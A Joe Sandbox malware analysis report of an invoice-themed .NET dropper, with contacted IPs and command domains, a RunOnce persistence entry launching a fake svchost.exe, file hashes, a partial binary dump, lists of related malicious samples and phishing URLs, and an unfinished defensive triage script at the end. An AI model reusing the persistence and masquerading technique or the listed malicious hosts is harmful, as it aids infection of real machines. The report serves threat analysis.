        https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | false | | high
        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmp | false | | high
        https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | false | | high
        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmp | false | | high

                                                                                                  Contacted IPs


                                                                                                  Public

        IP | Domain | Country | ASN | ASN Name | Malicious
        104.21.71.230 | unknown | United States | 13335 | CLOUDFLARENETUS | true
        185.157.161.86 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | false
        185.192.70.170 | unknown | Netherlands | 42831 | UKSERVERS-ASUKDedicatedServersHostingandCo-Location | false

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 355838
Start date: 22.02.2021
Start time: 07:44:22
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 18s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: CN-Invoice-XXXXX9808-19011143287990.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@56/29@6/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 12.8% (good quality ratio 11.9%)
• Quality average: 80.8%
• Quality standard deviation: 28.7%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 51.104.139.180, 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.139.144, 92.122.145.220, 52.255.188.83, 92.122.144.200, 51.103.5.186, 51.11.168.160, 92.122.213.194, 92.122.213.247, 104.42.151.234, 20.54.26.129, 168.61.161.212
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
07:45:27 | API Interceptor | 2x Sleep call for process: svchost.exe modified
07:45:30 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX explorer.exe "C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
07:45:38 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX explorer.exe "C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
07:45:54 | API Interceptor | 41x Sleep call for process: powershell.exe modified
07:46:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
104.21.71.230 | PurchaseOrdersCSTtyres004786587.exe | malicious | coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html
185.157.161.86 | CN-Invoice-XXXXX9808-19011143287990.exe | malicious |
185.157.161.86 | Order_List_PO# 081929.exe | malicious |
185.157.161.86 | order-1812896543124646450.exe | malicious |
185.157.161.86 | order-181289654312464649.exe | malicious |
185.157.161.86 | order-181289654312464648.exe | malicious |
185.157.161.86 | Order_1101201918_AUTECH.exe | malicious |
185.157.161.86 | 50404868-c352-422f-a608-7fd64b335eec.exe | malicious |
185.157.161.86 | 74725794.pdf.exe | malicious |
185.157.161.86 | Order_List_PO# 0819289.exe | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
coroloboxorozor.com | INVOICE_47383.EXE | malicious | 172.67.172.17
coroloboxorozor.com | PurchaseOrdersCSTtyres004786587.exe | malicious | 104.21.71.230
nanopc.linkpc.net | CN-Invoice-XXXXX9808-19011143287990.exe | malicious | 185.157.161.86
nanopc.linkpc.net | Order_List_PO# 081929.exe | malicious | 185.157.161.86
nanopc.linkpc.net | order-1812896543124646450.exe | malicious | 185.157.161.86
nanopc.linkpc.net | order-181289654312464649.exe | malicious | 185.157.161.86
nanopc.linkpc.net | order-181289654312464648.exe | malicious | 185.157.161.86
nanopc.linkpc.net | ORDER PMX-PT-2001 STOCK+NOVO.exe | malicious | 185.157.162.81
nanopc.linkpc.net | DHL_10177_R293_DOCUMENT.exe | malicious | 105.112.101.201

ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | Selected New Order.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | Unterlagen PDF.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | RFQ file_pdf.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | abominable.exe | malicious | 1.1.1.1
CLOUDFLARENETUS | Copy_remittnce.exe | malicious | 162.159.130.233
CLOUDFLARENETUS | uTorrent.exe | malicious | 104.18.88.101
CLOUDFLARENETUS | uTorrent.exe | malicious | 104.18.88.101
CLOUDFLARENETUS | Purchase order.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | SecuriteInfo.com.W32.AIDetectGBM.malware.02.16429.exe | malicious | 104.21.50.15
CLOUDFLARENETUS | SecuriteInfo.com.Variant.Zusy.340597.28655.exe | malicious | 104.17.62.50
CLOUDFLARENETUS | Order.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | purchase order.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | PURCHASE ORDER.exe | malicious | 172.67.188.154
CLOUDFLARENETUS | telex transfer.exe | malicious | 104.21.19.200
CLOUDFLARENETUS | AgroAG008021921doc_pdf.exe | malicious | 23.227.38.74
CLOUDFLARENETUS | docs-9035.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | MPC-PU-FO-0011-00 .exe | malicious | 162.159.134.233
CLOUDFLARENETUS | JFAaEh5hB6.exe | malicious | 172.67.141.244
CLOUDFLARENETUS | Njs4kjnD5X.dll | malicious | 104.20.185.68
CLOUDFLARENETUS | INVOICE_47383.EXE | malicious | 172.67.172.17
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://podcasterz.hu/softaculous/RjcHrladaah1w/ | malicious | 31.132.1.41
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://caminhodosveadeiros.com.br/h/Ld51n5yo2sVpA9ix2ZHZLqX7/ | malicious | 31.132.1.41
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | http://blackbarrymobile.com | malicious | 94.229.72.119
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://theautomaticacademy.co.uk/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Creed20200921_2219.pdf.html | malicious | 91.109.113.202
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://www.linkedin.com/redir/redirect?url=kjifs%2Ehijkrest%2Exyz%2F%405067%4012180%40%2F&urlhash=3yN5&#raju.daswani@fastmarkets.com | malicious | 5.101.151.31
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://www.louviers-houseofbeauty.co.uk/fcub/roundcube/index.php?email=marta.valadas@novobanco.pt | malicious | 91.109.113.202
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://www.louviers-houseofbeauty.co.uk/fcub/roundcube/index.php?email=marta.valadas@novobanco.pt | malicious | 91.109.113.202
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | http://flamme.co | malicious | 94.229.72.116
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | Quote Order #103888864.exe | malicious | 94.229.65.194
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | isb777amx.exe | malicious | 91.244.181.85
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | http://cs.tekblue.net | malicious | 94.229.72.121
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | ErxMjVrB.exe | malicious | 94.229.71.167
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | juice.exe | malicious | 156.227.195.1
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 3a#U0430.exe | malicious | 94.229.72.243
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 430#U0437.js | malicious | 178.159.0.38
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 430#U0437.js | malicious | 178.159.0.38
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 70payment $37,140.exe | malicious | 191.101.22.90
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 30NEW ORDER.exe | malicious | 191.101.22.21
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 6LQNTVfdpa.exe | malicious | 191.101.22.12
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 2sapfile_pdf.exe | malicious | 191.101.22.12
OBE-EUROPEObenetworkEuropeSE | JFAaEh5hB6.exe | malicious | 45.148.16.42
OBE-EUROPEObenetworkEuropeSE | BMfiIGROO2.exe | malicious | 45.148.16.42
OBE-EUROPEObenetworkEuropeSE | SLAX3807432211884DL772508146394DO.exe | malicious | 194.32.146.140
OBE-EUROPEObenetworkEuropeSE | CN-Invoice-XXXXX9808-19011143287990.exe | malicious | 185.157.161.86
OBE-EUROPEObenetworkEuropeSE | 18.02.2021 PAYMENT INFO.exe | malicious | 185.157.160.233
OBE-EUROPEObenetworkEuropeSE | DHL_Shipment_Notofication#554334.exe | malicious | 217.64.149.164
OBE-EUROPEObenetworkEuropeSE | 07oof4WcEB.exe | malicious | 45.148.16.42
OBE-EUROPEObenetworkEuropeSE | Codes.exe | malicious | 185.157.161.104
OBE-EUROPEObenetworkEuropeSE | CN-Invoice-XXXXX9808-19011143287989.exe | malicious | 185.157.160.233
OBE-EUROPEObenetworkEuropeSE | 3yevr0iqCW.exe | malicious | 45.148.16.42
OBE-EUROPEObenetworkEuropeSE | CN-Invoice-XXXXX9808-19011143287989 (2).exe | malicious | 185.157.160.233
OBE-EUROPEObenetworkEuropeSE | Statement.exe | malicious | 185.157.162.107
OBE-EUROPEObenetworkEuropeSE | Order_List_PO# 081929.exe | malicious | 185.157.161.86
OBE-EUROPEObenetworkEuropeSE | order-1812896543124646450.exe | malicious | 185.157.161.86
OBE-EUROPEObenetworkEuropeSE | Doc#6620200947535257653.exe | malicious | 185.157.160.233
OBE-EUROPEObenetworkEuropeSE | DHL_10177_R29_DOCUMENT.exe | malicious | 185.157.160.233
OBE-EUROPEObenetworkEuropeSE | order-181289654312464649.exe | malicious | 185.157.161.86
OBE-EUROPEObenetworkEuropeSE | order-181289654312464648.exe | malicious |
                                                                                                                    • 185.157.161.86
                                                                                                                    Doc#6620200947535257653.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    Scan_order.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.61

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe

Associated Sample Name / URL                               Detection
PurchaseOrdersCSTtyres004786587.exe                        malicious
3zKVfxhs18.exe                                             malicious
AWB783079370872.docm                                       malicious
DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe      malicious
CN-Invoice-XXXXX9808-19011143287990.exe                    malicious
Payment Advice 170221.exe                                  malicious
Payment Receipt.jar                                        malicious
miner.exe                                                  malicious
875666665.xlsm.xlsm                                        malicious
DOCX.doc.doc                                               malicious
v.exe                                                      malicious
uaa.exe                                                    malicious
r.exe                                                      malicious
j.exe                                                      malicious
99.exe                                                     malicious
m.exe                                                      malicious
n.exe                                                      malicious
DdV1LG7bLJ.exe                                             malicious
TBN HMX SPECS.xlsm                                         malicious
VESSEL CONTACT DETAILS, LOAD & DISPORT.doc                 malicious

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.5975851327512959
Encrypted: false
SSDEEP: 6:0Fnxllek1GaD0JOCEfMuaaD0JOCEfMKQmDYfutAl/gz2cE0fMbhEZolrRSQ2hyYp:09jTGaD0JcaaD0JwQQYmtAg/0bjSQJ
MD5: 1690D60C794A050032229706F1A3D10C
SHA1: EAFE954522B89C5F2013F133693158530A1465E3
SHA-256: 0480DEAE9119A63BF1DFE20F5AC6AB01614931B09DCE216F467AEA2A764221E5
SHA-512: B205889F1A3A87FEA1A82D470E98C6D3663FD75B7A72CD0D766D6E5A0A3B9C887518D37FCF7409942E992098E88030688C1EBC3C1A601ABFAD93EF3A0E425053
Malicious: false
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x95d40a86, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.09625771879899726
Encrypted: false
SSDEEP: 12:E80+pzaXO4blCV5djUKi80+pzaXO4blCV5djUK:EzgzJVnGzgzJVn
MD5: 11F32E8BB44083F2E25D79D4B77F5775
SHA1: 679040ABDEB9267694340CFBDEE198D2EAC61CFF
SHA-256: 7A24D6D879D9DA31CF7F786EE7CDE5257FD70675635C0E612DC02CFCE8A60597
SHA-512: 29342B8CD2572C09AC195ED53807467A4A48F8BEC93A68D511B72E215D827D316A95084EA244559BCAD49D54B1873D740D1A0BC5B45B23D298C024F8E0B3A17F
Malicious: false
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.11144509983272985
Encrypted: false
SSDEEP: 3:gbD1Ev+IIncAr+/t7l/bJdAtiYzxrlll/all:gvQ+IIncAE7t4XdxllG
MD5: 7E1E0C5D8E42457E1EBC55063ABF8900
SHA1: A1BE2EEC29393988E3B133A3DBEB295054F79FA9
SHA-256: 64C599627275B5A37638535EBAD05F233DC37FB8968F41EE51E7847B65D2C161
SHA-512: 5452EE93D52038458CCCEBB5FC18C80AB74C9E302176C567960F190E6B6A4891A9CE2C1E5A243F80142C858B72D7629489FA91613320ABA0BA7CB76B736E205F
Malicious: false
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SSCPUVYAPWRJCSOY_5d6ccfe7d5a2138396f817535b246bb9955b2a_e573b765_184c8058\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 16876
Entropy (8bit): 3.779361989604296
Encrypted: false
SSDEEP: 384:OsjnytBUZMX+D5aqqp/u7saX4ItxM56/p:OsjoBUiOD5a5/u7saX4ItxMI
MD5: CD427CF331607D16676E0BBA2C15AB25
SHA1: A69698C0647828D3F29C3BF0E1A69325A6032147
SHA-256: 1D36AC5EB47906A04E679CFB19B0B344F5FD2F89B58E25B630D64D2B8A927607
SHA-512: 603048432F19D4250D88136015E6C578154CE2EB76CC58D96659B613DAD7B0875DDA78CC622B780129181C99F84214AC20A5786C05627F65AC23988D3DA758CF
Malicious: false
Preview: Version=1 EventType=CLR20r3 EventTime=132584823574782206 ReportType=2 Consent=1 UploadTime=132584823983844247 ReportStatus=268435456 ReportIdentifier=06c7a4f4-f3cc-4e7c-8b4f-a7c708f48dfd IntegratorReportIdentifier=46401a23-bb91-477f-b57a-b79f6e261dec Wow64Host=34404 Wow64Guest=332 NsAppName=CN-Invoice-XXXXX9808-19011143287990.exe AppSessionGuid=000015e4-0001-0016-6081-b2b33109d701 TargetAppId=W:0006390065107f9da3a624c40a80ef9f40a000000904!0000e463d219a1d4dbde375e4f53c2fc250d6ee9d7f
C:\ProgramData\Microsoft\Windows\WER\Temp\WER106A.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4799
Entropy (8bit): 4.566271468639747
Encrypted: false
SSDEEP: 48:cvIwSD8zsgJgtWI9e2hWSC8Bt8fm8M4JpFFD+q8v6zt48crrTd:uITfm1xSNMJtKeFcrrTd
MD5: 844AFF7D37235E2E8A445576524EC9F4
SHA1: 0A71850305BAD95DE090F2BDD4D46A28C591FA5F
SHA-256: 40DC55BF1021ED79EAA2CCAC7A5CA58A0735F672C6F0CB548E4C2C96AC335FE8
SHA-512: 059C142096C91317E884C2C60CEBF49626E3C9474F6282B08A6E781A3958123583B24093C8EB326734A45261A5952653D8FB5C5A7D32C95F1178274E046ECEF0
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="872696" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B6.tmp.csv
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 57152
Entropy (8bit): 3.0488481526810443
Encrypted: false
SSDEEP: 1536:I1H67I6HF/5tvVeydWwZGPkdmCwipfHF07wD5gptHXUhSwdmOOvRGIDN:I1H67I6HF/5tvVeydWwZGPkdmCwipfHa
MD5: E6CEA42F3E86569C087C3FD9A64DB6F8
SHA1: 931951637B6762AF983BBE7E6B984783DD7EA708
SHA-256: 4352EEFF578A4C6ED5928FF6517B00A591DF5C745175C55C3C0289DCFD27CCA8
SHA-512: 53768AEE5FA8437B604A7DE90B80DF0540AAAE022331E185F01AE351AD487CF86538E3D04297868CD21BB4DDC81C074D8CB56B7C21C6397AD04B5A4A1D8516E8
Malicious: false
Preview: ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A7B.tmp.txt
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 13340
Entropy (8bit): 2.7049251281701188
Encrypted: false
SSDEEP: 96:9GiZYWWlUYhgEY+Y5pSHHYEZnFtBi6PieOwIKrDLaaBqbUDIKfx:9jZDW5pxwsLaaBqbUMKfx
MD5: 5D5A2FC0D482AB859C851032AC5D4BB8
SHA1: 29F9DCED712DAF860402A3344DBEF3F8654DE99A
SHA-256: 1D5EC13567946C00907FE758055498792FA807379DA8FDCA62074CB8E19DD03B
SHA-512: 3B3537E4BD6C4397F6395A3798D496C72AB506EB144AA8051681797657DA05784CC4A11BD65201D47BC86D1DE7674738EEF934DC41E01B723A9820F844215E04
Malicious: false
Preview: TimerResolution 156250; PageSize 4096; NumberOfPhysicalPages 1048315; LowestPhysicalPageNumber 1; HighestPhysicalPageNumber 1310719; AllocationGranularity 65536; MinimumUserModeAddress 65536; MaximumUserModeAddress 140737488289791; ActiveProcessorsAffinityMask

C:\ProgramData\Microsoft\Windows\WER\Temp\WER741.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8492
Entropy (8bit):3.710954846877531
Encrypted:false
SSDEEP:192:Rrl7r3GLNiR+aM6IY6YIeSUAeINgmfZndSb/CprQ89b1nOsfOnm:RrlsNiYp636YRSUAeINgmfjSba1nNfv
MD5:FF5873664FCD5B316EA3CA1C89FE5C49
SHA1:C8E4B9AA8BAAEF9A7BE6E3A00B027CE85150F2F6
SHA-256:8634C6310F94852DFA26090A153D044FDE16B77BAF43CBEEBB900C9AB1F01B27
SHA-512:746D5D73C7C22F27FC6EF5AF2671880E15703C53F600BCE460ED3C4D5BE5FB45D2F648FCA96E237B78CB84E7AEB4F8EA32FD5D371C73E89DB910D31F8F358921
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCD7.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Mon Feb 22 15:46:09 2021, 0x1205a4 type
Category:dropped
Size (bytes):308516
Entropy (8bit):3.732502521290974
Encrypted:false
SSDEEP:3072:vuWx02jd+pOVhes9gIOgF50FNZi50yU8wUCgUEkgyrWeu/iAeobjkxaU:L0jpe9RpD6Di5l+TjdrWQaj/U
MD5:DE308525DA996CED860E957C437A02B3
SHA1:80B40D9956E42E6B5E6817ADAE96CE88904E86C7
SHA-256:752A5D657439A5670750DE13A982712653D4882DEFC4FE281522AB5902D15EE4
SHA-512:7C6D1AAD6DE31E563708B67011CCDAB39CED3F0FB027C28E1EFBCEBE1323013996455FD8952CD02658F856FA7DD88D48288C0080909DDB253D2EE14B35146055
Malicious:false
Preview: MDMP....... .........3`...................U...........B......d-......GenuineIntelW...........T.............3`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):206848
Entropy (8bit):5.522318927512162
Encrypted:false
SSDEEP:1536:OQEpTCImp9zO6/XSTwtPo55rKrFUcDOC53bzf01l:OQJta6/XQIFNMl
MD5:A656F522F604872E02DAEE9DBC458D9C
SHA1:E463D219A1D4DBDE375E4F53C2FC250D6EE9D7F1
SHA-256:A0EBCB3078763EB8ACCA534831EF9CA1A213347328698AA3CDA7C5BD23CD81D8
SHA-512:6D13F052BC55D278B3D6A2B0DDD286572D9E45E96FBB8F52F64847B5C93B4E7C21EDCBD2E42CCD096A660C86E1BAFEC84DD45C41195FA0C3533AE1BD1E82D9CA
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 26%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..n............... ........@.. ..............................4.....@....................................W....................v.......`....................................................... ............... ..H............text...$l... ...n.................. ..`.rsrc................p..............@..@.reloc.......`.......&..............@..B........................H.......8<...O...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0...........r...p....r...p....s........+...&.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...........:...................o).........o4.......8........*........$.j........0...........r...p....r...p....s........+...'.......(...+o/.......88.......(0...........(1.......(.................(2...o'...&.....(3...

C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe:Zone.Identifier
Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview: [ZoneTransfer]....ZoneId=0
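Two of the report's signatures are visible directly in the two records above: the dropper writes a byte-identical copy of itself (same MD5/SHA1/SHA-256 as the submitted sample) under C:\Users\Public\Documents with the benign name svchost.exe, and it writes a Zone.Identifier stream next to it with ZoneId=0 (Local machine), so the copy carries no Mark-of-the-Web even though the original arrived from the Internet. The following triage script is an added example, not part of the Joe Sandbox report or its tooling: it applies those three checks (system binary name outside System32/SysWOW64, dropped file hash equal to the sample hash, Zone.Identifier with a zone below Internet) to records built from the paths and hashes listed on this page. The record field names are the script's own, the ZONE_NAMES table is the standard Windows URLZONE numbering, and the Zone.Identifier text is reconstructed from the 26-byte preview above and labelled as constructed.

```python
"""Triage a sandbox dropped-file listing for self-copy, name masquerading
and Mark-of-the-Web suppression. Added example; not Joe Sandbox code."""
import ntpath
import re

# Windows URLZONE values as written into the Zone.Identifier ADS.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Only legitimate homes for the system binaries below (lower-case prefixes).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

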